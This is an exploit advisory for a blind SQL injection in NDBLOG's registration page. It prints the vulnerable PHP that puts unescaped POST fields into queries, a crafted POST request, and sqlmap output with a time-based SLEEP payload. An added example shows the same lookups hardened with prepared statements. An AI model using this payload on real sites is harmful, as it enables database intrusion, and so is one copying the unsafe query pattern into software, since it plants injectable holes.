
NDBLOG Blind SQL Injection Vulnerability

Author: EjRaM-HaCkEr, Published: 14-10-2014
###################################################
# Title: NDBLOG Blind SQL Injection Vulnerability #
# Exploit Author : EjRaM-HaCkEr #
# Version : All #
# Vendor Home : www.traidnt.net #
# Date: 2014/09/19 #
# Tested in: Linux #
###################################################

code:
$user = $_POST['user'] ;
$pass = md5($_POST['pass']) ;
$mail = $_POST['mail'] ;
$country = $_POST['country'] ;
$age = intval($_POST['age']) ;
$img = $_POST['img'] ;

if (empty($img)){$img = 'imges/no-user-mec.png' ; }

// $mail and $user come straight from $_POST and are placed inside the SQL string as-is
$cm = $db->Query("SELECT mail FROM users WHERE mail = '$mail'") ;
$cn = $db->Query("SELECT name FROM users WHERE user = '$user'") ;

— Exploit —

http://localHost/register.php

POST:
user='&pass=1234&mail='mail@mail.com&img=&age=00&country=00&register=%D8%AA%D8%B3%D8%AC%D9%8A%D9%84+%D8%B9%D8%B6%D9%88%D9%8A%D8%A9+%D8%AC%D8%AF%D9%8A%D8%AF%D8%A9

by sqlmap
Place: POST
Parameter: mail
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user='&pass=1234&mail=sw@w.com' AND SLEEP(5) AND 'x'='x&img=&age=00&country=33&register=%D8%AA%D8%B3%D8%AC%D9%8A%D9%84 %D8%B9%D8%B6%D9%88%D9%8A%D8%A9 %D8%AC%D8%AF%D9%8A%D8%AF%D8%A9
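
A hardened form of the two lookups in the code excerpt above, as an added example that is not part of the original advisory or of the NDBLOG code base. It assumes PDO with the SQLite driver; the in-memory `users` table, the sample rows and the function names `isTaken` and `checkRegistration` are constructed for illustration.

```php
<?php
// Added example (not NDBLOG code). Assumptions: PDO with the SQLite driver;
// an in-memory table stands in for the application's MySQL `users` table.

function isTaken(PDO $pdo, string $column, string $value): bool
{
    // The column name comes from a fixed allow-list, never from the request.
    if (!in_array($column, ['mail', 'user'], true)) {
        throw new InvalidArgumentException('unexpected column');
    }
    // The value is bound as data, so quotes in it cannot change the query.
    $stmt = $pdo->prepare("SELECT 1 FROM users WHERE $column = ? LIMIT 1");
    $stmt->execute([$value]);
    return $stmt->fetchColumn() !== false;
}

function checkRegistration(PDO $pdo, array $post): string
{
    $user = (string)($post['user'] ?? '');
    $mail = (string)($post['mail'] ?? '');

    // Reject malformed addresses before touching the database.
    if (filter_var($mail, FILTER_VALIDATE_EMAIL) === false) {
        return 'invalid mail';
    }
    if ($user === '' || isTaken($pdo, 'user', $user)) {
        return 'user unavailable';
    }
    if (isTaken($pdo, 'mail', $mail)) {
        return 'mail already registered';
    }
    return 'ok';
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (user TEXT, name TEXT, mail TEXT)');
$pdo->exec("INSERT INTO users VALUES ('alice', 'Alice', 'alice@example.com')");

// The mail value from the sqlmap payload above is now handled as plain data.
$payloadMail = "sw@w.com' AND SLEEP(5) AND 'x'='x";
var_dump(isTaken($pdo, 'mail', $payloadMail));
echo checkRegistration($pdo, ['user' => 'bob', 'mail' => $payloadMail]), "\n";
echo checkRegistration($pdo, ['user' => 'bob', 'mail' => 'alice@example.com']), "\n";
echo checkRegistration($pdo, ['user' => 'bob', 'mail' => 'bob@example.com']), "\n";
```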

===========================================================
